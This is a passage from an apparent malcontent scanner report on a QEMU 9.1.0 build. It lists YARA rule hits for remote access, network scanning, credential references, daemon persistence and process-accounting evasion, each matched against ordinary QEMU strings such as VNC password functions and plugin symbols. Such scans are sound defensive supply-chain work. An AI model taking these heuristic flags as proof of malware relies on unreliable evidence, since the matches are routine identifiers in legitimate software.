[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng-random.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng-random.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm_backend](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm_backend&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/vhost-user-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fvhost-user-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/console.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fconsole.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/dbus-display.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fdbus-display.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/qemu-spice.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fqemu-spice.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/migration/channel-block.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fmigration%2Fchannel-block.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/tcg/i386/tcg-target.c.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftcg%2Fi386%2Ftcg-target.c.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/trace/control-internal.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftrace%2Fcontrol-internal.h&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | -| MEDIUM | [fs/proc/pid_cmdline](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-cmdline.yara#proc_cmdline) | access command-line of other processes | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | -| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [hw/dev/block_ice](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/block-device.yara#block_devices) | works with block devices | [/dev/block/%u](https://github.com/search?q=%2Fdev%2Fblock%2F%25u&type=code)
[/sys/dev/block](https://github.com/search?q=%2Fsys%2Fdev%2Fblock&type=code) | -| MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | -| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | -| MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | -| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping 0x](https://github.com/search?q=ping+0x&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | -| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | -| MEDIUM | [net/remote_control/vnc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_user) | vnc user | [VNC_](https://github.com/search?q=VNC_&type=code)
[vnc_password](https://github.com/search?q=vnc_password&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [net/tcp/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | -| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/tun_tap](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tun_tap.yara#tun_tap) | accesses the TUN/TAP device driver | [/dev/net/tun](https://github.com/search?q=%2Fdev%2Fnet%2Ftun&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [-daemon](https://github.com/search?q=-daemon&type=code)
[daemonize](https://github.com/search?q=daemonize&type=code)
[is_daemon](https://github.com/search?q=is_daemon&type=code)
[os_daemon](https://github.com/search?q=os_daemon&type=code)
[os_set_daemon](https://github.com/search?q=os_set_daemon&type=code)
[qemu_daemon](https://github.com/search?q=qemu_daemon&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [pid_file](https://github.com/search?q=pid_file&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [d is not known!!](https://github.com/search?q=d+is+not+known%21%21&type=code) | -| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | -| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code) | -| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | -| LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | -| LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | -| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | -| LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | -| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | -| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | -| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | -| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Could not load plugin](https://github.com/search?q=Could+not+load+plugin&type=code)
[Plugin options](https://github.com/search?q=Plugin+options&type=code)
[cap_disas_plugin](https://github.com/search?q=cap_disas_plugin&type=code)
[gen_plugin_u64_ptr](https://github.com/search?q=gen_plugin_u64_ptr&type=code)
[load a plugin](https://github.com/search?q=load+a+plugin&type=code)
[op_plugin](https://github.com/search?q=op_plugin&type=code)
[output from TCG plugins](https://github.com/search?q=output+from+TCG+plugins&type=code)
[plugin file](https://github.com/search?q=plugin+file&type=code)
[plugin_add_dyn_cb_arr](https://github.com/search?q=plugin_add_dyn_cb_arr&type=code)
[plugin_atexit_cb](https://github.com/search?q=plugin_atexit_cb&type=code)
[plugin_bool_parse](https://github.com/search?q=plugin_bool_parse&type=code)
[plugin_cb__udata](https://github.com/search?q=plugin_cb__udata&type=code)
[plugin_cond_to_tcgcond](https://github.com/search?q=plugin_cond_to_tcgcond&type=code)
[plugin_disas](https://github.com/search?q=plugin_disas&type=code)
[plugin_dyn_cb_arr_cmp](https://github.com/search?q=plugin_dyn_cb_arr_cmp&type=code)
[plugin_end_code](https://github.com/search?q=plugin_end_code&type=code)
[plugin_entry_code](https://github.com/search?q=plugin_entry_code&type=code)
[plugin_flush_cb](https://github.com/search?q=plugin_flush_cb&type=code)
[plugin_flush_destroy](https://github.com/search?q=plugin_flush_destroy&type=code)
[plugin_from_name](https://github.com/search?q=plugin_from_name&type=code)
[plugin_gen_disable_mem](https://github.com/search?q=plugin_gen_disable_mem&type=code)
[plugin_gen_inject](https://github.com/search?q=plugin_gen_inject&type=code)
[plugin_gen_insn_end](https://github.com/search?q=plugin_gen_insn_end&type=code)
[plugin_gen_insn_start](https://github.com/search?q=plugin_gen_insn_start&type=code)
[plugin_gen_mem](https://github.com/search?q=plugin_gen_mem&type=code)
[plugin_gen_tb_end](https://github.com/search?q=plugin_gen_tb_end&type=code)
[plugin_gen_tb_start](https://github.com/search?q=plugin_gen_tb_start&type=code)
[plugin_get_dyn_cb](https://github.com/search?q=plugin_get_dyn_cb&type=code)
[plugin_get_hwaddr](https://github.com/search?q=plugin_get_hwaddr&type=code)
[plugin_get_registers](https://github.com/search?q=plugin_get_registers&type=code)
[plugin_hwaddr_is_io](https://github.com/search?q=plugin_hwaddr_is_io&type=code)
[plugin_init](https://github.com/search?q=plugin_init&type=code)
[plugin_insn_data](https://github.com/search?q=plugin_insn_data&type=code)
[plugin_insn_disas](https://github.com/search?q=plugin_insn_disas&type=code)
[plugin_insn_haddr](https://github.com/search?q=plugin_insn_haddr&type=code)
[plugin_insn_size](https://github.com/search?q=plugin_insn_size&type=code)
[plugin_insn_symbol](https://github.com/search?q=plugin_insn_symbol&type=code)
[plugin_insn_vaddr](https://github.com/search?q=plugin_insn_vaddr&type=code)
[plugin_list](https://github.com/search?q=plugin_list&type=code)
[plugin_load_list](https://github.com/search?q=plugin_load_list&type=code)
[plugin_mem_is_store](https://github.com/search?q=plugin_mem_is_store&type=code)
[plugin_mem_size_shift](https://github.com/search?q=plugin_mem_size_shift&type=code)
[plugin_num_vcpus](https://github.com/search?q=plugin_num_vcpus&type=code)
[plugin_opt_parse](https://github.com/search?q=plugin_opt_parse&type=code)
[plugin_path_to_binary](https://github.com/search?q=plugin_path_to_binary&type=code)
[plugin_print_address](https://github.com/search?q=plugin_print_address&type=code)
[plugin_read_register](https://github.com/search?q=plugin_read_register&type=code)
[plugin_register_atexit](https://github.com/search?q=plugin_register_atexit&type=code)
[plugin_register_cb](https://github.com/search?q=plugin_register_cb&type=code)
[plugin_register_dyn_cb](https://github.com/search?q=plugin_register_dyn_cb&type=code)
[plugin_register_inline](https://github.com/search?q=plugin_register_inline&type=code)
[plugin_reset_destroy](https://github.com/search?q=plugin_reset_destroy&type=code)
[plugin_reset_uninstall](https://github.com/search?q=plugin_reset_uninstall&type=code)
[plugin_scoreboard_find](https://github.com/search?q=plugin_scoreboard_find&type=code)
[plugin_scoreboard_free](https://github.com/search?q=plugin_scoreboard_free&type=code)
[plugin_scoreboard_new](https://github.com/search?q=plugin_scoreboard_new&type=code)
[plugin_start_code](https://github.com/search?q=plugin_start_code&type=code)
[plugin_tb_get_insn](https://github.com/search?q=plugin_tb_get_insn&type=code)
[plugin_tb_n_insns](https://github.com/search?q=plugin_tb_n_insns&type=code)
[plugin_tb_trans_cb](https://github.com/search?q=plugin_tb_trans_cb&type=code)
[plugin_tb_vaddr](https://github.com/search?q=plugin_tb_vaddr&type=code)
[plugin_uninstall](https://github.com/search?q=plugin_uninstall&type=code)
[plugin_update_ns](https://github.com/search?q=plugin_update_ns&type=code)
[plugin_user_exit](https://github.com/search?q=plugin_user_exit&type=code)
[plugin_user_postfork](https://github.com/search?q=plugin_user_postfork&type=code)
[plugin_vcpu_cb__simple](https://github.com/search?q=plugin_vcpu_cb__simple&type=code)
[plugin_vcpu_exit_hook](https://github.com/search?q=plugin_vcpu_exit_hook&type=code)
[plugin_vcpu_for_each](https://github.com/search?q=plugin_vcpu_for_each&type=code)
[plugin_vcpu_idle_cb](https://github.com/search?q=plugin_vcpu_idle_cb&type=code)
[plugin_vcpu_init_hook](https://github.com/search?q=plugin_vcpu_init_hook&type=code)
[plugin_vcpu_mem_cb](https://github.com/search?q=plugin_vcpu_mem_cb&type=code)
[plugin_vcpu_resume_cb](https://github.com/search?q=plugin_vcpu_resume_cb&type=code)
[plugin_vcpu_syscall](https://github.com/search?q=plugin_vcpu_syscall&type=code)
[qemu_plugin_add_dyn](https://github.com/search?q=qemu_plugin_add_dyn&type=code)
[qemu_plugin_install](https://github.com/search?q=qemu_plugin_install&type=code)
[qemu_plugin_opts](https://github.com/search?q=qemu_plugin_opts&type=code)
[qemu_plugin_outs](https://github.com/search?q=qemu_plugin_outs&type=code)
[qemu_plugin_path_to](https://github.com/search?q=qemu_plugin_path_to&type=code)
[qemu_plugin_request](https://github.com/search?q=qemu_plugin_request&type=code)
[qemu_plugin_reset](https://github.com/search?q=qemu_plugin_reset&type=code)
[qemu_plugin_u64_add](https://github.com/search?q=qemu_plugin_u64_add&type=code)
[qemu_plugin_u64_get](https://github.com/search?q=qemu_plugin_u64_get&type=code)
[qemu_plugin_u64_set](https://github.com/search?q=qemu_plugin_u64_set&type=code)
[qemu_plugin_u64_sum](https://github.com/search?q=qemu_plugin_u64_sum&type=code)
[qemu_plugin_version](https://github.com/search?q=qemu_plugin_version&type=code)
[tcg_gen_plugin_cb](https://github.com/search?q=tcg_gen_plugin_cb&type=code)
[tcg_gen_plugin_mem_cb](https://github.com/search?q=tcg_gen_plugin_mem_cb&type=code)
[tlb_plugin_lookup](https://github.com/search?q=tlb_plugin_lookup&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | -| LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/qemu-ifdown](https://github.com/search?q=%2Fetc%2Fqemu-ifdown&type=code)
[/etc/qemu-ifup](https://github.com/search?q=%2Fetc%2Fqemu-ifup&type=code)
[/etc/qemu/qemu.conf](https://github.com/search?q=%2Fetc%2Fqemu%2Fqemu.conf&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | -| LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchownat) | May change file ownership | [fchownat](https://github.com/search?q=fchownat&type=code) | -| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | -| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | -| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | -| LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | -| LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | -| LOW | [net/resolve/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#gethostbyname) | [resolve network host name to IP address](https://linux.die.net/man/3/gethostbyname) | [gethostbyname](https://github.com/search?q=gethostbyname&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug)
